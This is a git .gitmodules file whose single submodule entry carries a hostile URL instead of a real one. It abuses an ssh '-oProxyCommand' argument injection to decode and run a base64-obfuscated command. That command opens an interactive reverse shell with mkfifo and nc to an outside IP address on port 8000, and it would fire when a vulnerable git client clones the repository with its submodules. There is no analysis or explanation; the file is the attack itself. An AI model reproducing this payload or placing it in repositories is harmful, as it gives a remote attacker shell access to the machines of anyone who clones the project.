[submodule "misc2"]
	path = misc2
	url = ssh://-oProxyCommand=printf cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTA3LjE5MS4xMTYuMTQzIDgwMDAgPi90bXAvZgo= | base64 -D | sh /wat
